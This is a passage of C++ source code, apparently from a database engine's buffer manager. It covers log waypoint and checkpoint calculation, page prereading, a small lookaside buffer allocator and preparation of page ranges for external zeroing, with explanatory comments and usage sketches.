// If we are in term | detach | recovery, the waypoint / max log required is the current log ...
// (do not yet support keeping the waypoint during these times)
//
; // nothing
}
else
{
//
// During normal operation, we subtract the specified waypoint depth ...
//
const LONG lWaypointDepth = (LONG)UlParam( PinstFromIfmp( ifmp ), JET_paramWaypointLatency );
if ( 0 < ( lgposPreferredWaypoint.lGeneration - lWaypointDepth ) )
{
lgposPreferredWaypoint.lGeneration = lgposPreferredWaypoint.lGeneration - lWaypointDepth;
}
else if ( CmpLgpos( &lgposCurrentWaypoint, &lgposMin ) != 0 )
{
// if subtracting the waypoint depth would make a negative waypoint, then let the waypoint
// sit at the current waypoint (likely lGen 1) until we move enough logs to calculate the waypoint right.
lgposPreferredWaypoint = lgposCurrentWaypoint;
}
}
//
// If we haven't flushed a log, it cannot be part of the waypoint.
// Note that we allow partially flushed log to be part of waypoint. Only way to fix that would be actually track
// the actual LGPOS of the waypoint in the db header le_lGenMaxRequired
//
LGPOS lgposFlushTip;
plog->LGFlushTip( &lgposFlushTip );
lgposPreferredWaypoint.lGeneration = min( lgposPreferredWaypoint.lGeneration, lgposFlushTip.lGeneration );
//
// We can't move the waypoint back!
//
// If the current waypoint has somehow gotten ahead of where we'd ideally like it, then we
// must maintain the waypoint at that level.
//
*plgposBestWaypoint = MaxLgpos( lgposCurrentWaypoint, lgposPreferredWaypoint );
}
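// Worked example (illustrative numbers only, matching the diagram above): with
// lgenCommitted = 0x31, a flush tip at generation 0x31, JET_paramWaypointLatency
// of 2 and a current waypoint at generation 0x2E, the preferred waypoint becomes
// 0x31 - 2 = 0x2F, which is already <= the flush tip, and MaxLgpos( 0x2E, 0x2F )
// yields a best possible waypoint of generation 0x2F (with isec / ib pinned to
// lgposMax because only whole-log waypoint jumps are supported).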
void BFIMaintWaypointRequest(
__in IFMP ifmp )
{
FMP* pfmp = &g_rgfmp[ ifmp ];
LGPOS lgposCurrentWaypoint;
LGPOS lgposBestWaypoint;
// we read current, then best possible waypoint / log tip, in this order.
lgposCurrentWaypoint = pfmp->LgposWaypoint();
BFGetBestPossibleWaypoint( ifmp, 0, &lgposBestWaypoint );
// Should never go backwards from the current waypoint.
Assert( CmpLgpos( lgposBestWaypoint, lgposCurrentWaypoint) >= 0 );
//
// Check if the waypoint was improved...
//
if ( CmpLgpos( lgposBestWaypoint, lgposCurrentWaypoint ) > 0 )
{
//
// Yeah, we can request a higher waypoint be established
//
// We should only be increasing the waypoint by a whole generation ...
Assert( lgposCurrentWaypoint.lGeneration < lgposBestWaypoint.lGeneration );
// We can't just update the pfmp->m_lgposWaypoint, we need to update the database
// header with this fact first. We use checkpoint maintenance to maintain all our log
// positions / references.
BFIMaintCheckpointRequest();
return;
}
//
// Ok, so we can't improve the waypoint.
//
return;
}
// Returns the log position of the oldest Begin Transaction at level 0 for
// any session that has modified any buffer in the cache. If no buffers
// have been modified, then this function will return lgposMax. This
// function is used to compute the current checkpoint depth.
void BFIGetLgposOldestBegin0( const IFMP ifmp, LGPOS * const plgpos, const BOOL fExternalLocking, LGPOS lgposOldestTrx = lgposMin )
{
FMP* pfmp = &g_rgfmp[ ifmp ];
BFFMPContext* pbffmp = NULL;
if ( fExternalLocking )
{
// external locking indicates the caller already has the appropriate locks
Assert( pfmp->FBFContextReader() ); // or could be writer, change if needed
pbffmp = (BFFMPContext*)pfmp->DwBFContext();
Assert( pbffmp );
Assert( pbffmp->fCurrentlyAttached ); // handled below, just in case
}
else
{
pfmp->EnterBFContextAsReader();
pbffmp = (BFFMPContext*)pfmp->DwBFContext();
}
// if no context is present, there must be no oldest begin 0
if ( !pbffmp || !pbffmp->fCurrentlyAttached )
{
*plgpos = lgposMax;
if ( !fExternalLocking )
{
pfmp->LeaveBFContextAsReader();
}
return;
}
// CONSIDER: should we delete any clean BFs we find during this process
// to increase the accuracy of this computation? if we land on a clean BF
// then we could return an artificially old checkpoint which could affect
// our crash recovery time. we defer the removal of clean BFs from this
// index so this is not a corner case
// find the first entry in the oldest begin 0 index
BFOB0::ERR errOB0;
BFOB0::CLock lockOB0;
pbffmp->bfob0.MoveBeforeFirst( &lockOB0 );
errOB0 = pbffmp->bfob0.ErrMoveNext( &lockOB0 );
// we found the first entry in the index
if ( errOB0 != BFOB0::ERR::errNoCurrentEntry )
{
// return the lgpos of this oldest entry rounded down to the next level
// of uncertainty in the index
PBF pbf;
errOB0 = pbffmp->bfob0.ErrRetrieveEntry( &lockOB0, &pbf );
Assert( errOB0 == BFOB0::ERR::errSuccess );
*plgpos = BFIOB0Lgpos( ifmp, pbf->lgposOldestBegin0 ); // factor in the OB0 uncertainty.
// if this entry points to a clean BF then request checkpoint depth
// maintenance to clean up the index
if ( pbf->bfdf == bfdfClean )
{
BFIMaintCheckpointDepthRequest( &g_rgfmp[ pbf->ifmp ], bfcpdmrRequestRemoveCleanEntries );
}
}
// we did not find the first entry in the index
else
{
// return lgposMax to indicate that there are no BFs with an Oldest
// Begin 0 dependency set
*plgpos = lgposMax;
}
// unlock the oldest begin 0 index
pbffmp->bfob0.UnlockKeyPtr( &lockOB0 );
// scan the Oldest Begin 0 Overflow List and collect the Oldest Begin 0
// from there as well
pbffmp->critbfob0ol.Enter();
for ( PBF pbf = pbffmp->bfob0ol.PrevMost(); pbf != pbfNil; pbf = pbffmp->bfob0ol.Next( pbf ) )
{
if ( CmpLgpos( plgpos, &pbf->lgposOldestBegin0 ) > 0 )
{
*plgpos = pbf->lgposOldestBegin0;
}
if ( pbf->bfdf == bfdfClean )
{
BFIMaintCheckpointDepthRequest( &g_rgfmp[ pbf->ifmp ], bfcpdmrRequestRemoveCleanEntries );
}
}
// cache the last value returned by this function
pbffmp->lgposOldestBegin0Last = *plgpos;
pbffmp->critbfob0ol.Leave();
if ( !fExternalLocking )
{
pfmp->LeaveBFContextAsReader();
}
#pragma prefast( suppress:6237, "When CONFIG OVERRIDE_INJECTION is off, UlConfigOverrideInjection() is a no-op." )
if ( (BOOL)UlConfigOverrideInjection( 50764, fFalse ) && CmpLgpos( lgposOldestTrx, lgposMin ) != 0 )
{
// scan through all initialized BFs looking for cached pages from this IFMP
// so that we can verify our OB0 computation
LGPOS lgposOldestBegin0Scan;
lgposOldestBegin0Scan = lgposMax;
for ( IBF ibf = 0; ibf < cbfInit; ibf++ )
{
PBF pbf = PbfBFICacheIbf( ibf );
// BUGBUG: this is unsynchronized
// we cannot grab the latch because we will deadlock
// this BF contains a cached paged from this IFMP
if ( pbf->ifmp == ifmp )
{
// track the oldest lgposOldestBegin0 we find for this IFMP
if ( CmpLgpos( &lgposOldestBegin0Scan, &pbf->lgposOldestBegin0 ) > 0 )
{
lgposOldestBegin0Scan = pbf->lgposOldestBegin0;
}
}
}
// OB0 may have gone down since we got it from index, but not beyond oldest transaction (so use lower of
// the two values for comparison)
LGPOS lgposOldestBegin0Index = ( CmpLgpos( plgpos, &lgposOldestTrx ) < 0 ) ? *plgpos : lgposOldestTrx;
// the OB0 we found from the index had better be at least as old as the one we found while
// scanning the cache!
Enforce( CmpLgpos( &lgposOldestBegin0Index, &lgposOldestBegin0Scan ) <= 0 );
}
}
// Returns the log position of the oldest Begin Transaction at level 0 for
// any session that has modified any buffer in the cache. If no buffers
// have been modified, then this function will return lgposMax. This
// function is used to compute the current checkpoint depth.
void BFGetLgposOldestBegin0( IFMP ifmp, LGPOS * const plgpos, LGPOS lgposOldestTrx )
{
BFIGetLgposOldestBegin0( ifmp, plgpos, fFalse, lgposOldestTrx );
}
// Sets the log position for the most recent log record to reference this
// buffer for a modification. This log position determines when we can
// safely write a buffer to disk by allowing us to wait for the log to be
// flushed past this log position (under Write Ahead Logging). This value
// is set to lgposMin by default. The page must be WAR Latched or Write
// Latched.
void BFSetLgposModify( const BFLatch* pbfl, LGPOS lgpos )
{
// validate IN args
Assert( FBFWARLatched( pbfl ) || FBFWriteLatched( pbfl ) );
Assert( FBFUpdatableLatch( pbfl ) );
// WAR Latches and Logged Operations
//
// So here we assert a more restrictive case, that we must have the W-latch,
// not the WAR/x-latch ... why? Well because as of E14 we moved version page
// models, and we could not version a page in ErrBFUpgradeReadLatchToWARLatch
// in such a way to avoid violated the user assumptions (that we don't move to
// a new buffer) and protect the waypoint ... BUT upon closer inspection, the
// only operations done in a WAR latch were deferred version store type work
// that does not require logged operations. We are asserting that here. If
// we need to do logged operations that is entirely tractable, but then we
// merely need to teach CSR::ErrUpgradeToWARLatch() that a read to WAR upgrade
// can fail and in such a case currency is completely lost.
Assert( FBFWriteLatched( pbfl ) );
Assert( FBFNotWARLatched( pbfl ) );
FMP* pfmp = &g_rgfmp[ PBF( pbfl->dwContext )->ifmp ];
Assert( ( !pfmp->Pinst()->m_plog->FLogDisabled() && pfmp->FLogOn() ) ||
!CmpLgpos( &lgpos, &lgposMin ) );
// set the lgposModify for this BF
BFISetLgposModify( PBF( pbfl->dwContext ), lgpos );
}
// Sets the log position for the last Begin Transaction at level 0 for this
// session that modified this buffer, if more recent than the last log
// position set. This log position is used to determine the current
// checkpoint depth. This value is set to lgposMax by default. The page must
// be WAR Latched or Write Latched.
void BFSetLgposBegin0( const BFLatch* pbfl, LGPOS lgpos, const TraceContext& tc )
{
// validate IN args
Assert( FBFWARLatched( pbfl ) || FBFWriteLatched( pbfl ) );
Assert( FBFUpdatableLatch( pbfl ) );
Assert( tc.iorReason.Iorp( ) == iorpNone );
if ( PBF( pbfl->dwContext )->bfdf >= bfdfDirty )
{
// Reason for this restriction is documented in BFSetLgposModify() under
// the "WAR Latches and Logged Operations" comment.
// Also if you look in BFIDirtyPage() you will find code for resetting
// the OB0 that wouldn't work properly if we set the OB0 lgpos with a
// WAR latch.
Assert( FBFWriteLatched( pbfl ) );
Assert( FBFNotWARLatched( pbfl ) );
}
FMP* pfmp = &g_rgfmp[ PBF( pbfl->dwContext )->ifmp ];
Assert( ( !pfmp->Pinst()->m_plog->FLogDisabled() && pfmp->FLogOn() ) ||
!CmpLgpos( &lgpos, &lgposMax ) );
// set the lgposOldestBegin0 for this BF
BFISetLgposOldestBegin0( PBF( pbfl->dwContext ), lgpos, tc );
}
/////////////
// Preread
// The following functions provide support for prereading pages from the
// disk before they are actually needed. This technique can be used to
// minimize or eliminate buffer cache misses when Read Latching pages.
// Prereads the given range of pages in the given database. If cpg is greater
// than zero, we will preread forwards from pgnoFirst to pgnoFirst + cpg - 1.
// If cpg is less than zero, we will preread backwards from pgnoFirst to
// pgnoFirst + cpg + 1. cpg can not be zero.
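//
// Illustrative usage sketch (hedged: the pgno/cpg values are made up, and the priority shown
// simply mirrors the neutral-priority construction used elsewhere in this file):
//
//     CPG cpgActual = 0;
//     const BFPriority bfpriT = BfpriBFMake( g_pctCachePriorityNeutral, (BFTEMPOSFILEQOS)0 );
//     // preread pages 100..107 forwards
//     BFPrereadPageRange( ifmp, 100, 8, &cpgActual, NULL, bfprfDefault, bfpriT, tc );
//     // preread pages 200..193 backwards (note: rgfPageWasCached must be NULL in this case)
//     BFPrereadPageRange( ifmp, 200, -8, &cpgActual, NULL, bfprfDefault, bfpriT, tc );
//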
void BFPrereadPageRange( IFMP ifmp, const PGNO pgnoFirst, CPG cpg, CPG* pcpgActual, BYTE *rgfPageWasCached, const BFPreReadFlags bfprf, const BFPriority bfpri, const TraceContext& tc )
{
LONG cbfPreread = 0;
// no one uses a negative cpg with a non-NULL rgfPageWasCached at this point,
// but if one decides to, they should make sure they understand the semantics of
// rgfPageWasCached, which will return the flags in descending order of page numbers
// in this case.
Expected( cpg >= 0 || rgfPageWasCached == NULL );
Assert( tc.iorReason.Iorp( ) == iorpNone );
#ifdef DEBUG
if ( cpg >= 0 )
{
Expected( pgnoFirst + cpg >= pgnoFirst );
}
else
{
Expected( pgnoFirst + cpg < pgnoFirst );
}
#endif // DEBUG
// calculate preread direction
const LONG lDir = cpg > 0 ? 1 : -1;
if ( lDir >= 0 )
{
AssertPREFIX( pgnoFirst - lDir < pgnoFirst );
}
else
{
AssertPREFIX( pgnoFirst - lDir > pgnoFirst );
}
// initialize the flag array saying that page was cached by default (we will explicitly
// query the status in case of errors)
if ( rgfPageWasCached )
{
for ( INT ipg = 0; ipg < cpg; ipg++ )
{
rgfPageWasCached[ ipg ] = fTrue;
}
}
// schedule all specified pages to be preread
#ifdef PREREAD_COMBINABLE_DEBUG
LONG cbfCached = 0;
BFPreReadFlags bfprfCombinablePass = bfprfCombinableOnly;
#else // !PREREAD_COMBINABLE_DEBUG
BFPreReadFlags bfprfCombinablePass = bfprfDefault;
#endif // PREREAD_COMBINABLE_DEBUG
ULONG pgno;
for ( pgno = pgnoFirst; pgno != pgnoFirst + cpg; pgno += lDir )
{
const ERR err = ErrBFIPrereadPage( ifmp, pgno, BFPreReadFlags( bfprfCombinablePass | bfprf ), bfpri, tc );
if ( err == JET_errSuccess )
{
cbfPreread++;
if ( rgfPageWasCached != NULL )
{
rgfPageWasCached[ abs( (INT)( pgno - pgnoFirst ) ) ] = fFalse;
}
#ifdef PREREAD_COMBINABLE_DEBUG
if ( bfprfCombinablePass == bfprfDefault )
{
bfprfCombinablePass = bfprfCombinableOnly;
}
#endif // PREREAD_COMBINABLE_DEBUG
}
#ifdef PREREAD_COMBINABLE_DEBUG
else if ( err == errBFPageCached )
{
cbfCached++;
}
else if ( err == errDiskTilt )
{
AssertRTL( bfprfCombinablePass == bfprfCombinableOnly );
// Back up a page and retry it without the combinable-only flag ...
pgno -= lDir;
bfprfCombinablePass = bfprfDefault;
}
#endif // PREREAD_COMBINABLE_DEBUG
else if ( err != errBFPageCached )
{
Assert( err < 0 );
break;
}
}
// start issuing prereads
if ( cbfPreread )
{
CallS( g_rgfmp[ ifmp ].Pfapi()->ErrIOIssue() );
Ptls()->cbfAsyncReadIOs = 0;
}
// return the number of pages preread if requested
if ( pcpgActual )
{
*pcpgActual = abs( (INT)( pgno - pgnoFirst ) );
}
// set the remaining flags, if required.
if ( rgfPageWasCached != NULL )
{
for ( ; pgno != pgnoFirst + cpg; pgno += lDir )
{
rgfPageWasCached[ abs( (INT)( pgno - pgnoFirst ) ) ] = (BYTE)FBFInCache( ifmp, pgno );
}
}
Assert( FBFApiClean() );
}
// Prereads the given array of single pages in the given database.
void BFPrereadPageList( IFMP ifmp, PGNO* prgpgno, CPG* pcpgActual, const BFPreReadFlags bfprf, const BFPriority bfpri, const TraceContext& tc )
{
PGNO* prgpgnoSorted = NULL;
Assert( tc.iorReason.Iorp( ) == iorpNone );
// sort the pages to minimize random IO
BOOL fAlreadySorted = fTrue;
size_t cpgno;
for ( cpgno = 1; prgpgno[cpgno - 1] != pgnoNull; cpgno++ )
{
fAlreadySorted = fAlreadySorted && ( cpgno < 2 || prgpgno[cpgno - 2] < prgpgno[cpgno - 1] );
}
if ( !fAlreadySorted )
{
prgpgnoSorted = new PGNO[cpgno];
if ( prgpgnoSorted )
{
memcpy( prgpgnoSorted, prgpgno, cpgno * sizeof( PGNO ) );
Assert( prgpgnoSorted[cpgno - 1] == pgnoNull );
std::sort( prgpgnoSorted, prgpgnoSorted + cpgno - 1, CmpPgno );
prgpgno = prgpgnoSorted;
}
}
for ( size_t ipgno = 0; prgpgno[ipgno] != pgnoNull; ipgno++ )
{
Assert( !prgpgnoSorted || ipgno < 1 || prgpgno[ipgno - 1] <= prgpgno[ipgno] ); // we don't remove duplicates
}
#ifdef PREREAD_COMBINABLE_DEBUG
BFPreReadFlags bfprfCombinablePass = bfprfCombinableOnly;
#else // !PREREAD_COMBINABLE_DEBUG
BFPreReadFlags bfprfCombinablePass = bfprfDefault;
#endif // PREREAD_COMBINABLE_DEBUG
// schedule each page for preread
LONG cbfPreread = 0;
size_t ipgno;
for ( ipgno = 0; prgpgno[ ipgno ] != pgnoNull; ipgno++ )
{
const ERR err = ErrBFIPrereadPage( ifmp, prgpgno[ ipgno ], BFPreReadFlags( bfprfCombinablePass | bfprf ), bfpri, tc );
if ( err == JET_errSuccess )
{
cbfPreread++;
#ifdef PREREAD_COMBINABLE_DEBUG
if ( bfprfCombinablePass == bfprfDefault )
{
bfprfCombinablePass = bfprfCombinableOnly;
}
#endif // PREREAD_COMBINABLE_DEBUG
}
#ifdef PREREAD_COMBINABLE_DEBUG
else if ( err == errDiskTilt )
{
AssertRTL( bfprfCombinablePass == bfprfCombinableOnly );
// Back up a page and retry it without the combinable-only flag ...
ipgno--;
bfprfCombinablePass = bfprfDefault;
}
#endif // PREREAD_COMBINABLE_DEBUG
else if ( err != errBFPageCached )
{
Assert( err < 0 );
break;
}
}
// start issuing prereads
if ( cbfPreread )
{
CallS( g_rgfmp[ ifmp ].Pfapi()->ErrIOIssue() );
Ptls()->cbfAsyncReadIOs = 0;
}
// return the number of pages preread if requested
if ( pcpgActual )
{
*pcpgActual = ipgno;
}
Assert( FBFApiClean() );
delete[] prgpgnoSorted;
}
// Prereads a single page in the given database
ERR ErrBFPrereadPage( const IFMP ifmp, const PGNO pgno, const BFPreReadFlags bfprf, const BFPriority bfpri, const TraceContext& tc )
{
Assert( tc.iorReason.Iorp( ) == iorpNone );
const ERR err = ErrBFIPrereadPage( ifmp, pgno, BFPreReadFlags( bfprf & ~bfprfNoIssue ), bfpri, tc );
if ( err >= JET_errSuccess &&
( 0 == ( bfprf & bfprfNoIssue ) ) )
{
CallS( g_rgfmp[ ifmp ].Pfapi()->ErrIOIssue() );
Ptls()->cbfAsyncReadIOs = 0;
}
// Can not purely assert this b/c of the log prereading code.
//Assert( FBFApiClean() );
Assert( Ptls()->cbfAsyncReadIOs == 0 || bfprf & bfprfNoIssue );
return err;
}
///////////////////////
// Memory Allocation
// The following routines allow the user to allocate space in the buffer
// cache for use as general purpose memory. Remember that every buffer
// allocated from the buffer cache will reduce the buffer cache's
// effectiveness by reducing the amount of memory it has to utilize.
// Allocates a buffer for use as general purpose memory. This buffer can
// not be stolen for use by others. The buffer must be returned to the
// buffer cache when it is no longer needed via BFFree(). Note that if we
// cannot immediately allocate a buffer because they are all currently in
// use, we will wait until a buffer is free to return, possibly across an
// I/O.
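//
// Illustrative usage sketch (hedged: bfasTemporary is assumed to be a valid BFAllocState for
// the caller's situation; passing 0 for the size requests the maximum configured buffer size,
// per BFAlloc() below):
//
//     void* pv = NULL;
//     BFAlloc( bfasTemporary, &pv, 0 );   // blocks until a buffer can be handed out
//     // ... use pv as scratch memory ...
//     BFFree( pv );                       // always hand the buffer back when done
//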
// To avoid constantly allocating and freeing buffers in JET_paramEnableViewCache
// mode, we create a small lookaside list of buffers.
CSmallLookasideCache::CSmallLookasideCache()
{
m_cbBufferSize = 0; // must be init'd before class will work
memset( m_rgpvLocalLookasideBuffers, 0, sizeof(m_rgpvLocalLookasideBuffers) );
}
CSmallLookasideCache::~CSmallLookasideCache()
{
}
void CSmallLookasideCache::Init( const INT cbBufferSize )
{
m_cbBufferSize = cbBufferSize;
#ifdef MEMORY_STATS_TRACKING
m_cHits = 0;
m_cAllocs = 0;
m_cFrees = 0;
m_cFailures = 0;
#endif
}
void CSmallLookasideCache::Term()
{
ULONG cSlotsFilled = 0;
C_ASSERT( m_cLocalLookasideBuffers == _countof( m_rgpvLocalLookasideBuffers ) );
for( INT ipb = 0; ipb < m_cLocalLookasideBuffers; ++ipb )
{
if ( m_rgpvLocalLookasideBuffers[ipb] )
{
OSMemoryPageFree( m_rgpvLocalLookasideBuffers[ipb] );
m_rgpvLocalLookasideBuffers[ipb] = NULL;
cSlotsFilled++;
}
}
#ifdef MEMORY_STATS_TRACKING
/*
// Interesting to note that if we were to get a lot of allocations that aren't temporary in
// usage, overruns will reflect this number... even though it wasn't technically an overrun
// how I was originally thinking of it, as in buffers in "current" use.
OSTrace( JET_tracetagBufferManager, OSFormat(
"CSmallLookasideCache efficacy:\n"
"\tSlots Used: %d\n"
"\tCache Hits: %I64d\n"
"\tAllocs: %I64d\n"
"\tFailures: %I64d\n"
"\tOverruns: %I64d (if this is high compared to Hits, consider increasing m_cLocalLookasideBuffers)\n",
cSlotsFilled, m_cHits, m_cAllocs, m_cFailures, m_cFrees ) );
*/
#endif
}
void * CSmallLookasideCache::PvAlloc()
{
// validate parameters
Assert( m_cbBufferSize );
if ( 0 == m_cbBufferSize )
{
return NULL;
}
// check the list of cached buffers
void * pb = GetCachedPtr<void *>( m_rgpvLocalLookasideBuffers, m_cLocalLookasideBuffers );
// if not, allocate one
if( NULL == pb )
{
pb = PvOSMemoryPageAlloc( m_cbBufferSize, NULL );
#ifdef MEMORY_STATS_TRACKING
m_cAllocs++;
#endif
}
#ifdef MEMORY_STATS_TRACKING
else
{
m_cHits++;
}
if ( NULL == pb )
{
m_cFailures++;
}
#endif
return pb;
}
void CSmallLookasideCache::Free( void * const pv )
{
if( pv )
{
if ( !FCachePtr<void *>( pv, m_rgpvLocalLookasideBuffers, m_cLocalLookasideBuffers ) )
{
// Didn't manage to get it in the lookaside list, list full, free buffer
OSMemoryPageFree( pv );
#ifdef MEMORY_STATS_TRACKING
m_cFrees++;
#endif
}
}
}
void BFIAlloc( __in_range( bfasMin, bfasMax - 1 ) const BFAllocState bfas, void** ppv, ICBPage icbBufferSize )
{
// validate IN args
Assert( g_fBFInitialized );
Assert( icbPageInvalid != icbBufferSize );
// we need to bump the buffer size up to the OS commit granularity, as that's the minimum we'll
// actually allocate (unless the configured page size itself is smaller, i.e. 2KB pages)
if ( (DWORD)g_rgcbPageSize[g_icbCacheMax] >= OSMemoryPageCommitGranularity() &&
(DWORD)g_rgcbPageSize[icbBufferSize] < OSMemoryPageCommitGranularity() )
{
Assert( icbBufferSize < IcbBFIBufferSize( OSMemoryPageCommitGranularity() ) );
icbBufferSize = IcbBFIBufferSize( OSMemoryPageCommitGranularity() );
Assert( icbPageInvalid != icbBufferSize );
}
// init OUT args
*ppv = NULL;
// try forever until we allocate a temporary buffer
const LONG cRFSCountdownOld = RFSThreadDisable( 10 );
const BOOL fCleanUpStateSaved = FOSSetCleanupState( fFalse );
for ( BOOL fWait = fFalse; !(*ppv); fWait = fTrue )
{
// for now we allocate the largest possible page we might be requested for.
// sadly in a configuration where we like to use less memory we end up allocating the
// maximum size because if we kept a g_BFAllocLookasideList[icbPageMax] type array and
// allocated from the right CSmallLookasideCache element, we wouldn't know which of
// these to free the pv / buffer to, unless we made BFFree() take the size (which is odd).
*ppv = g_pBFAllocLookasideList->PvAlloc();
// if we didn't get any memory, snooze and retry
if ( !(*ppv) && fWait )
{
UtilSleep( dtickFastRetry );
}
}
RFSThreadReEnable( cRFSCountdownOld );
FOSSetCleanupState( fCleanUpStateSaved );
}
void BFAlloc( __in_range( bfasMin, bfasMax - 1 ) const BFAllocState bfas, void** ppv, INT cbBufferSize )
{
// We can not handle less than the OS memory commit level
if ( cbBufferSize )
{
BFIAlloc( bfas, ppv, IcbBFIBufferSize( cbBufferSize ) );
}
else
{
// else, assume max configured cache size
BFIAlloc( bfas, ppv, g_icbCacheMax );
}
}
// Frees a buffer allocated with BFAlloc().
void BFFree( void* pv )
{
// validate IN args
Assert( g_fBFInitialized );
// if we were asked to free NULL then ignore it
if ( !pv )
{
// nop
return;
}
// free the temporary buffer to the lookaside list
g_pBFAllocLookasideList->Free( pv );
}
///////////////////
// Purge / Renounce / Abandon / Flush
// Renouncing a page indicates that we bear no more interest in the page and that
// when the page gets evicted, it should not count as a sign of cache pressure.
void BFRenouncePage( BFLatch* const pbfl, const BOOL fRenounceDirty )
{
// validate IN args
Assert( FBFReadLatched( pbfl ) );
// we can get the write latch
if ( ErrBFUpgradeReadLatchToWriteLatch( pbfl, fFalse ) == JET_errSuccess )
{
// perform the renouncing
BFIRenouncePage( PBF( pbfl->dwContext ), fRenounceDirty );
// release the write latch
BFWriteUnlatch( pbfl );
}
// we couldn't get the write latch
else
{
// release the read latch without renouncing the BF
BFReadUnlatch( pbfl );
}
}
// Abandon BF, which means it'll be purged without being written out.
// WARNING: this must only be called on a page which has been recently latched as a new page
// and not yet initialized, which means there is only one version of the page and we are about
// to purge it.
void BFAbandonNewPage( BFLatch* const pbfl, const TraceContext& tc )
{
Assert( FBFWriteLatched( pbfl ) );
// dirty pages are handled by BFIPurgeNewPage(), but we don't expect non-clean pages to
// come in here, so be extra-careful if this hits and you're tempted to remove the Expected()..
Expected( FBFDirty( pbfl ) == bfdfClean );
const PBF pbf = PbfBFILatchContext( pbfl->dwContext );
pbf->fAbandoned = fTrue;
BFIPurgeNewPage( pbf, tc );
pbfl->pv = NULL;
pbfl->dwContext = NULL;
}
//
// External Zeroing
//
// These functions (ErrBFPreparePageRangeForExternalZeroing, CpgBFGetOptimalLockPageRangeSizeForExternalZeroing,
// ErrBFLockPageRangeForExternalZeroing, BFPurgeLockedPageRangeForExternalZeroing and
// BFUnlockPageRangeForExternalZeroing) are used to write out any undo info associated with the pages and
// quiesce all reads and writes to a range of a specific file (IFMP) for the purpose of trimming, externally
// zeroing or during file shrinkage triggered by DB-shrink.
//
// o ErrBFPreparePageRangeForExternalZeroing: if it is a logged operation (trim or shrink), this must be called
// prior to logging the operation. Today, this function writes out any outstanding undo info hanging
// from the buffers related to the pages. This must be done prior to logging so that redo rebuilds
// the undo information necessary to undo any transactions before the page gets wiped out.
//
// o CpgBFGetOptimalLockPageRangeSizeForExternalZeroing: gets the number of pages considered optimal for external
// zeroing at one time. Zeroing too many pages at once may cause excessive contention in the buffer manager.
//
// o ErrBFLockPageRangeForExternalZeroing: must be called prior to performing the external operation.
// It write-latches all pages and enters a read-write range lock, in addition to synchronously setting
// their flush states to pgftUnknown. It returns an opaque context to be passed into subsequent functions.
// In addition, it also quiesces LLR (write log buffers + flush log file buffers + moves waypoint ahead),
// which is required because the zeroing/truncation operation is not LLR-protected in the buffer manager,
// so we need to make sure the logged operation cannot be lost, since we're about to perform a physical
// irreversible change to the file.
//
// o BFPurgeLockedPageRangeForExternalZeroing: must be called right after the external operation is
// successful. It purges all pages and their respective versions from the cache without flushing them,
// even if they are dirty. This must not be called with a zeroed/NULL context.
//
// o BFUnlockPageRangeForExternalZeroing: it's called last and it must always be called upon a successful
// ErrBFLockPageRangeForExternalZeroing call, regardless of whether or not the external operation
// succeeded. It unlatches all pages if there are any remaining (shouldn't be if BFPurgeLockedPageRangeForExternalZeroing
// was called) and leaves the read-write range lock, in addition to releasing resources allocated during the
// process. The opaque context is invalid once this function gets called. It's safe to call this function
// with a zeroed/NULL context during cleanup/teardown paths.
//
// WARNING: at higher levels than BF, you MUST only call ErrBFLockPageRangeForExternalZeroing() on pages that are "unusable"
// (i.e. not findable by other paths) such as space free or the root-space allocation path. This is to avoid deadlocking with
// any code that collects locks in non-pgno-ascending order, such as the B+ Tree navigation code.
//
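// Illustrative call order (hedged sketch: error handling, chunking via
// CpgBFGetOptimalLockPageRangeSizeForExternalZeroing and the surrounding logging are elided;
// dwContext is the opaque handle produced by the lock call):
//
//     Call( ErrBFPreparePageRangeForExternalZeroing( ifmp, pgnoFirst, cpg, tc ) );
//     // ... log the trim / shrink operation ...
//     DWORD_PTR dwContext = NULL;
//     Call( ErrBFLockPageRangeForExternalZeroing( ifmp, pgnoFirst, cpg, fTrimming, tc, &dwContext ) );
//     // ... perform the external zeroing / truncation against the file ...
//     BFPurgeLockedPageRangeForExternalZeroing( dwContext, tc );  // only if the zeroing succeeded
//     BFUnlockPageRangeForExternalZeroing( dwContext, tc );       // always, even on failure
//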
PBF PbfBFIGetFlushOrderLeafWithUndoInfoForExtZeroing( const PBF pbf )
{
PBF pbfOldestWithUndoInfo = pbfNil;
Assert( g_critBFDepend.FOwner() );
for ( PBF pbfVersion = PbfBFIGetFlushOrderLeaf( pbf, fFalse ); pbfVersion != pbfNil; pbfVersion = pbfVersion->pbfTimeDepChainPrev )
{
// WARNING: it is OK to perform the check below without a BF latch because
// in the context of external zeroing, nobody should be adding undo info, so
// the IF below will never transition from false to true.
// We will double-check if we transitioned from true to false once we have the latch.
if ( pbfVersion->prceUndoInfoNext != prceNil )
{
pbfOldestWithUndoInfo = pbfVersion;
break;
}
}
return pbfOldestWithUndoInfo;
}
ERR ErrBFPreparePageRangeForExternalZeroing( const IFMP ifmp, const PGNO pgnoFirst, const CPG cpg, const TraceContext& tc )
{
BFLatch bfl = { NULL, 0 };
PBF pbf = pbfNil;
BOOL fLatched = fFalse;
PBF pbfVersion = pbfNil;
BOOL fVersionLatched = fFalse;
BOOL fInCritDepend = fFalse;
ERR err = JET_errSuccess;
// For now, this is only relevant if logging is on.
if ( !g_rgfmp[ ifmp ].FLogOn() )
{
goto HandleError;
}
// Go through each page in the range.
const PGNO pgnoLast = pgnoFirst + cpg - 1;
for ( PGNO pgno = pgnoFirst; pgno <= pgnoLast; pgno++ )
{
const ERR errLatch = ErrBFILatchPage(
&bfl,
ifmp,
pgno,
BFLatchFlags( bflfNoTouch | bflfNoUncached | bflfNoFaultFail | bflfUninitPageOk | bflfLatchAbandoned ),
bfltWrite,
BfpriBFMake( g_pctCachePriorityNeutral, (BFTEMPOSFILEQOS)0 /* should not matter - NoUncached */ ),
tc );
if ( errLatch == errBFPageNotCached )
{
continue;
}
Call( errLatch );
fLatched = fTrue;
pbf = PbfBFILatchContext( bfl.dwContext );
// Go through each version of the page.
g_critBFDepend.Enter();
fInCritDepend = fTrue;
while ( ( pbfVersion = PbfBFIGetFlushOrderLeafWithUndoInfoForExtZeroing( pbf ) ) != pbfNil )
{
PBF pbfUndoInfo = pbfNil;
// Not the current version, latch it.
if ( pbfVersion != pbf )
{
if ( pbfVersion->sxwl.ErrTryAcquireWriteLatch() == CSXWLatch::ERR::errSuccess )
{
fVersionLatched = fTrue;
pbfUndoInfo = pbfVersion;
}
else
{
// Retry to avoid deadlocks because the BF rank is higher than the BFDepend critical section's.
g_critBFDepend.Leave();
fInCritDepend = fFalse;
UtilSleep( dtickFastRetry );
g_critBFDepend.Enter();
fInCritDepend = fTrue;
continue;
}
}
